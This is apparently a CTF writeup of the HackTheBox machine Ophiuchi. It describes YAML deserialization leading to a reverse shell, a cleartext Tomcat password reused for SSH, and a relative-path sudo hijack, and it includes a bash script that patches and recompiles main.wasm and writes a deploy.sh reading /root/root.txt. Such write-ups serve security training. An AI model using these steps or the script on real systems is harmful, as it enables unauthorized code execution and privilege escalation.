Ophiuchi | HackTheBox Writeup

Overview

Ophiuchi is a medium-difficulty Linux machine on HackTheBox, created by felamos.

User Part

An nmap scan found two open ports:

22: SSH

8080: HTTP

The website on port 8080 is a YAML parser: it takes YAML you submit and parses it server-side.

Searching for exploits against Java YAML parsers turned up a blog post on YAML deserialization.

The post included a proof-of-concept payload that makes the parser fetch a URL.

I submitted that payload with my own address in it and received a request from Ophiuchi's IP on my listener.

That confirmed the parser deserializes attacker-controlled tags. The post also linked to a GitHub repository for turning the callback into code execution.

I cloned that repository locally and looked at what it actually executes.

The repository README says to put the Java code you want to run in src/artsploit/AwesomeScriptEngineFactory.java, so I checked that file.

To confirm that the code in that file really runs on the target, I first changed it to ping my machine.

I edited AwesomeScriptEngineFactory.java accordingly and compiled it as described in the repository.

With an ICMP capture running on my side, the ping requests arrived.

For the actual shell, I created shell.sh on my machine and changed the Java code to download shell.sh onto the target and execute it.

That gave me a reverse shell in my terminal.

The next step is privilege escalation. The admin user's password is stored in clear text in the Tomcat users file (tomcat-users.xml).

With that password I could log in over SSH as admin.

Root Part

I ran sudo -l to see which commands admin can run as root, and it allows running one program.

I read that program's source.

The code loads main.wasm by a relative path, so it is read from the current working directory, and calls a function in it.

If the returned value f is 1, it executes deploy.sh (also by a relative path); otherwise it refuses.

To exploit this, I copied main.wasm into /tmp and wrote a custom deploy.sh there that reads root.txt.

But running the sudo command from /tmp only printed "Not ready to deploy": the function in main.wasm returns something other than 1.

Searching for a way to decompile main.wasm led to a StackOverflow question.

One of the comments mentions wabt, the WebAssembly Binary Toolkit.

As its repository describes, wasm2wat converts a .wasm binary to the .wat text format, and wat2wasm compiles the text back to .wasm.

Installation instructions for wabt came from this website.

I decompiled main.wasm with wasm2wat and changed the constant the function returns from 0 to 1.

Then I recompiled it to main.wasm with wat2wasm.
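The decompile, patch and recompile round trip above, as an added example that is not the writeup's code. The .wat module below is constructed to mirror what the writeup describes (one exported function that returns the constant 0); the function name info and the deploy.sh contents are assumptions, and the real main.wasm from the box is not reproduced here. Only the text patch runs offline; the full round trip needs wasm2wat and wat2wasm from wabt on the PATH.

```bash
#!/usr/bin/env bash
# Added example (not the writeup's code): wasm2wat -> edit -> wat2wasm round trip.
# SAMPLE_WAT is a constructed stand-in for the decompiled main.wasm; the export
# name "info" is an assumption.
set -eu

SAMPLE_WAT='(module
  (type (;0;) (func (result i32)))
  (func $info (type 0) (result i32)
    i32.const 0)
  (export "info" (func $info)))'

# Count lines containing "i32.const <value>" in a .wat file ($1 file, $2 value),
# used to confirm the patch before recompiling.
count_const() { grep -c "i32\.const $2" "$1" || true; }

# Copy $1 to $2 with every "i32.const 0" rewritten to "i32.const 1". Fails if
# the input has no such constant, so patching the wrong file is noticed
# instead of wat2wasm quietly rebuilding an unchanged module.
patch_wat() {
  grep -q 'i32\.const 0' "$1" || { echo "no i32.const 0 in $1" >&2; return 1; }
  sed -E 's/i32\.const 0([^0-9]|$)/i32.const 1\1/' "$1" > "$2"
}

# Write the deploy.sh that the sudo program runs once the function returns 1.
# Reading root.txt is what the writeup does; run any command here.
write_deploy_sh() {
  printf '#!/bin/bash\ncat /root/root.txt\n' > "$1"
  chmod +x "$1"
}

# Full round trip on a real binary: $1 input .wasm, $2 output .wasm.
# Requires wabt (https://github.com/WebAssembly/wabt).
rebuild_wasm() {
  local tmp
  tmp=$(mktemp -d)
  wasm2wat "$1" -o "$tmp/orig.wat"
  patch_wat "$tmp/orig.wat" "$tmp/patched.wat"
  wat2wasm "$tmp/patched.wat" -o "$2"
  rm -rf "$tmp"
}

demo_dir=$(mktemp -d)
printf '%s\n' "$SAMPLE_WAT" > "$demo_dir/main.wat"
patch_wat "$demo_dir/main.wat" "$demo_dir/patched.wat"
write_deploy_sh "$demo_dir/deploy.sh"
echo "before: $(count_const "$demo_dir/main.wat" 0) line(s) with i32.const 0"
echo "after:  $(count_const "$demo_dir/patched.wat" 1) line(s) with i32.const 1"
if command -v wat2wasm >/dev/null 2>&1; then
  wat2wasm "$demo_dir/patched.wat" -o "$demo_dir/main.wasm"
  echo "compiled $demo_dir/main.wasm with wabt"
else
  echo "wabt not installed; skipping wat2wasm"
fi
```

On the target, both the patched main.wasm and deploy.sh have to sit in the directory you run the sudo command from, since the program resolves both by relative path; check with count_const that exactly the intended constant changed before uploading, because a larger module can contain more than one i32.const 0.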

I uploaded the new main.wasm next to deploy.sh on the target and made deploy.sh executable.

Running the sudo command again from that directory executed deploy.sh and printed the root flag.
